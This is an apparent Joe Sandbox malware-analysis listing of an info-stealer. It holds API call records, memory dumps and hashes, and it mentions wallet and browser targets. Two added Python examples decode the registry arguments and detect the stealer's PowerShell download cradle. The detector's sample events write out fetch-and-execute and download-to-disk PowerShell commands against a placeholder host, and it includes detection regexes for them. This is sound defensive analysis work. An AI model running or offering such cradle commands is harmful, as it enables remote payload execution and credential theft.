                                    • Instruction Fuzzy Hash: 5641F9719102089BDF14EBA0C8AAFEDBB79AF14300F404569E016AB192EF716A49DFD1
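The strings and the ShellExecuteEx call in the record above are the parts of a PowerShell download cradle: the stealer concatenates the SysWOW64 powershell.exe path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL and `')"`, then launches the result. The detection logic below is an added example, not code from the sample or from Joe Sandbox. It runs over constructed Sysmon-style process-creation records (field names ParentImage, Image, CommandLine; the download URL and parent paths are placeholders, since the listing does not show the URL) and separates the in-memory cradle from a plain download-to-disk and from a routine admin command.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 field names).
# Event 0 reproduces the command line the stealer assembles from the strings
# in the listing; the URL is a placeholder, not taken from the sample.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''',
    },
    {   # routine admin use: no cradle
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-Process | Out-File C:\temp\procs.txt"''',
    },
    {   # downloads to disk without iex: not the cradle, still worth a look
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','C:\Users\Public\a.exe')"''',
    },
]

# Each indicator is one piece of the cradle. PowerShell accepts any unambiguous
# switch prefix, so -nop/-noprofile and -c/-command are matched as prefixes.
COMMANDLINE_INDICATORS = {
    "noprofile":         re.compile(r"(?i)(?<![\w-])-nop\w*"),
    "inline_command":    re.compile(r"(?i)(?<![\w-])-c(?:o\w*)?(?=\s)"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "webclient":         re.compile(r"(?i)Net\.WebClient"),
    "download_method":   re.compile(r"(?i)\.Download(?:String|File|Data)\s*\("),
}
# 32-bit PowerShell on a 64-bit host: the stealer is a 32-bit process, so the
# child it spawns comes from SysWOW64 rather than System32.
WOW64_POWERSHELL = re.compile(r"(?i)\\SysWOW64\\WindowsPowerShell\\")
URL_RE = re.compile(r"""(?i)\.Download(?:String|File|Data)\s*\(\s*['"]([^'"]+)['"]""")


def analyze(event):
    """Classify one process-creation event; returns indicators, URL and verdict."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in COMMANDLINE_INDICATORS.items() if rx.search(cmd)]
    if WOW64_POWERSHELL.search(event.get("Image", "")):
        hits.append("wow64_powershell")
    m = URL_RE.search(cmd)
    url = m.group(1) if m else None
    if "invoke_expression" in hits and "download_method" in hits:
        verdict = "download_cradle"      # fetched content is executed in memory
    elif "download_method" in hits or "webclient" in hits:
        verdict = "suspicious"           # network fetch, but no in-memory execution
    else:
        verdict = "benign"
    return {"indicators": hits, "url": url, "verdict": verdict,
            "parent": event.get("ParentImage")}


def scan(events):
    """Run analyze() over a list of events, preserving order."""
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["verdict"], r["url"], r["indicators"], "parent:", r["parent"])
```

The verdict hinges on the pair `iex` plus `.DownloadString(`, which is what makes this a fetch-and-execute cradle rather than a download; `-nop` and the SysWOW64 image path are recorded as context, and the parent image (file.exe here) is what ties the PowerShell child back to the stealer in a real investigation.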
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0152D3B8,00000000,00020119,?), ref: 00C94344
                                    • RegQueryValueExA.ADVAPI32(?,0152DF80,00000000,00000000,00000000,000000FF), ref: 00C94368
                                    • RegCloseKey.ADVAPI32(?), ref: 00C94372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C94397
                                    • lstrcat.KERNEL32(?,0152DF08), ref: 00C943AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 56efd82998a8cf14b103b1a55bccdaa05d5e28f9542cfce3e605e83a9d228851
                                    • Instruction ID: 7f5099e4c4cb1c2815dc41aae3373d5e660f882678760e25d842edd44faf2076
                                    • Opcode Fuzzy Hash: 56efd82998a8cf14b103b1a55bccdaa05d5e28f9542cfce3e605e83a9d228851
                                    • Instruction Fuzzy Hash: 134198B690020C6BDF14FBA0EC46FEE737CAB88700F444598B72597181EA7567989BD1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: d18c7d1ba658f31f6ec3a99a06c46e5b2687911f728fb10a39b3d3162d54f94b
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 9421C772F0062DAFDBA19F15CEC1A7F3A79EB81790F054115FA2967211C3304E419BE2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151BAF0,00000000,00020119,?), ref: 00C97FEE
                                    • RegQueryValueExA.ADVAPI32(?,0152D2D8,00000000,00000000,000000FF,000000FF), ref: 00C9800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00C98022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: a4b1f38fcdbe4671b61c9570598df6e46e48610017950110f5b5473c58bbb9d3
                                    • Instruction ID: 3c697516f70bfaca7c5a13f962fe76346d2642c0a9c20c1411b6de16a6c107f9
                                    • Opcode Fuzzy Hash: a4b1f38fcdbe4671b61c9570598df6e46e48610017950110f5b5473c58bbb9d3
                                    • Instruction Fuzzy Hash: 971191B1A44309EBDB00DF95ED49F7FBB78EB04B11F104119F716A7280DB7559049BA1
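Reading the registry and shell-folder calls in these records means decoding their raw hexadecimal arguments: 80000001 and 80000002 are the predefined roots HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, 00020119 is KEY_READ (0x20019) with KEY_WOW64_64KEY (0x100) added, and the 0000001C passed to SHGetFolderPathA is CSIDL_LOCAL_APPDATA. The parser below is an added example, not part of this report or of Joe Sandbox's tooling. It parses API bullets in the format used on this page (the input lines are copied from the records above) and annotates the RegOpenKeyEx and SHGetFolderPath calls with those symbolic names. The WOW64 flag is worth noting next to the SysWOW64 powershell.exe path elsewhere in the listing: a 32-bit process that asks for the 64-bit registry view is reading the native keys instead of the redirected WOW6432Node copies.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" bullet from the listing, e.g.
#   • RegOpenKeyExA.ADVAPI32(80000002,0151BAF0,00000000,00020119,?), ref: 00C97FEE
#   • wsprintfA.USER32 ref: 00C99457
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"              # RegOpenKeyExA.ADVAPI32
    r"(?:\((?P<args>[^)]*)\))?"                   # optional (arg,arg,...)
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"     # trailing ref: <address>
)

ROOT_KEYS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
# Composite registry rights are checked first, then single bits (winnt.h / winreg.h).
COMPOSITE_RIGHTS = [(0x000F003F, "KEY_ALL_ACCESS"), (0x00020019, "KEY_READ"), (0x00020006, "KEY_WRITE")]
RIGHT_BITS = {
    0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA", 0x26: "CSIDL_PROGRAM_FILES",
         0x28: "CSIDL_PROFILE"}

# Lines copied from the records on this page (the bullet is part of the page text).
LISTING = [
    "• RegOpenKeyExA.ADVAPI32(80000001,0152D3B8,00000000,00020119,?), ref: 00C94344",
    "• RegOpenKeyExA.ADVAPI32(80000002,0151BAF0,00000000,00020119,?), ref: 00C97FEE",
    "• Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B",
    r"• Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5",
    "• wsprintfA.USER32 ref: 00C99457",
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[object]      # int for hex values, None for '?', str for inline strings
    ref: Optional[int]


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one API bullet; returns None for lines that are not API calls."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = []
    for raw in (m.group("args") or "").split(","):
        raw = raw.strip()
        if not raw:
            continue
        if raw == "?":
            args.append(None)                # value the plugin could not resolve
        else:
            try:
                args.append(int(raw, 16))
            except ValueError:
                args.append(raw)             # inline string such as \Monero\wallet.keys
    ref = int(m.group("ref"), 16) if m.group("ref") else None
    return ApiCall(m.group("api"), m.group("module"), args, ref)


def decode_access_mask(mask: int) -> List[str]:
    """Expand a samDesired value into composite and single registry rights."""
    names = []
    for bits, name in COMPOSITE_RIGHTS:
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
    for bit in sorted(RIGHT_BITS):
        if mask & bit:
            names.append(RIGHT_BITS[bit])
            mask &= ~bit
    if mask:
        names.append(f"0x{mask:X}")          # bits not in the table
    return names


def annotate(call: ApiCall) -> List[str]:
    """Human-readable notes for the registry and shell-folder calls in the listing."""
    notes = []
    if call.api.startswith(("RegOpenKeyEx", "RegCreateKeyEx")):
        root = call.args[0] if call.args else None
        if isinstance(root, int):
            notes.append(f"hKey {root:08X} = {ROOT_KEYS.get(root, 'not a predefined root (handle or unresolved value)')}")
        sam_idx = 3 if call.api.startswith("RegOpenKeyEx") else 5   # samDesired position
        if len(call.args) > sam_idx and isinstance(call.args[sam_idx], int):
            rights = decode_access_mask(call.args[sam_idx])
            notes.append("samDesired = " + " | ".join(rights))
            if "KEY_WOW64_64KEY" in rights:
                notes.append("asks for the 64-bit registry view: a 32-bit (WOW64) caller reading native keys, not WOW6432Node")
    elif call.api.startswith("SHGetFolderPath") and len(call.args) > 1 and isinstance(call.args[1], int):
        csidl = call.args[1] & 0xFF                                  # drop CSIDL_FLAG_* bits
        notes.append(f"csidl {csidl:#04x} = {CSIDL.get(csidl, 'unlisted CSIDL')}")
    return notes


def decode_listing(lines):
    """Parse and annotate every API bullet in the given lines."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call:
            out.append((call, annotate(call)))
    return out


if __name__ == "__main__":
    for call, notes in decode_listing(LISTING):
        ref = f"{call.ref:08X}" if call.ref is not None else "?"
        print(f"{call.api}.{call.module} @ {ref}")
        for n in notes:
            print("   ", n)
```

Run as a script it prints one decoded line per call; the tables only cover the constants that appear in this report and can be extended for other API families. The `?` placeholders stay as None so that a caller can tell an unresolved argument from a genuine zero.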
                                    APIs
                                    • StrStrA.SHLWAPI(0152DE18,00000000,00000000,?,00C89F71,00000000,0152DE18,00000000), ref: 00C993FC
                                    • lstrcpyn.KERNEL32(00F57580,0152DE18,0152DE18,?,00C89F71,00000000,0152DE18), ref: 00C99420
                                    • lstrlen.KERNEL32(00000000,?,00C89F71,00000000,0152DE18), ref: 00C99437
                                    • wsprintfA.USER32 ref: 00C99457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 9a68999d63318b8b6024eb9cd728215bbc13f847a5c24b7e626526f320a701b1
                                    • Instruction ID: 9d495316d60c182780556cf9b545daa7af224f427b5035fd72e984983ee6e8ff
                                    • Opcode Fuzzy Hash: 9a68999d63318b8b6024eb9cd728215bbc13f847a5c24b7e626526f320a701b1
                                    • Instruction Fuzzy Hash: D901DE7550830CFFCB04EFA8D948EAE7B78EB48345F158248FA099B245D731EA44EB90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00C812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: c70ebfcd7a3114a6e5f020160ce461a36c914db3739f6f2f10df9838ee05255f
                                    • Instruction ID: b78098c680b38f3d5c307839c279eb8038bf8c6f8601ea31e9fe663a6f5e3cc1
                                    • Opcode Fuzzy Hash: c70ebfcd7a3114a6e5f020160ce461a36c914db3739f6f2f10df9838ee05255f
                                    • Instruction Fuzzy Hash: AB01CD79A4430DBBDB14EFE4EC49FAE77BCAB48701F104195FB1597280DA709A009B90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 735073a6f28429de5567b50e67ec73e6348b9d9f700e22c025f7b08c106cb2ab
                                    • Instruction ID: d84a38fee1d1f38f6210708b7dbc867c80a74592ffe683742ea66535d6d257a9
                                    • Opcode Fuzzy Hash: 735073a6f28429de5567b50e67ec73e6348b9d9f700e22c025f7b08c106cb2ab
                                    • Instruction Fuzzy Hash: 194104B110079C9FDF218B248DD9FFBBFE8AB45304F1444E8E99A97182E2719B459F60
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C96903
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C969C6
                                    • ExitProcess.KERNEL32 ref: 00C969F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: b8ac435e32594938ba62374505a6f1fbd44649665fb24d14b6937fcf800075e2
                                    • Instruction ID: ef7b020dec554b036521604f3313dfbaae8549de480a3cd67ead9b5c7f50b881
                                    • Opcode Fuzzy Hash: b8ac435e32594938ba62374505a6f1fbd44649665fb24d14b6937fcf800075e2
                                    • Instruction Fuzzy Hash: 55313CB1901218ABDB14EB90DC9AFDEB778AF58300F404189F305A7191DF706B48DFA9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CA0E10,00000000,?), ref: 00C989BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C989C6
                                    • wsprintfA.USER32 ref: 00C989E0
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: e20ca0cfe22175916fc8100a9c76eb96413e366f72a8d6b36348af010e8dc0b0
                                    • Instruction ID: a9e71109c1e19ad62ebd4dc58cd8f2441c5474a0f4b384f3f067696359e691ab
                                    • Opcode Fuzzy Hash: e20ca0cfe22175916fc8100a9c76eb96413e366f72a8d6b36348af010e8dc0b0
                                    • Instruction Fuzzy Hash: 142130B1A44308AFDB00DF94ED49FAEBBB8FB49711F104159F616A7280CB75A9009FA0
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C8A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 33221c8004a856578ab917f7c0d29ed2e367ac98d2b19e7170a68cd3829d2903
                                    • Instruction ID: 8e58817d9aba42598d104c0a84f6d8c89b910d959a390fbf07e8a8bdb6b97c7f
                                    • Opcode Fuzzy Hash: 33221c8004a856578ab917f7c0d29ed2e367ac98d2b19e7170a68cd3829d2903
                                    • Instruction Fuzzy Hash: 5DF01D7564C308EEE710BB66FC4CB5A32D8A34630AF10052AE70A971E0C7B49984EB56
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C996AE,00000000), ref: 00C98EEB
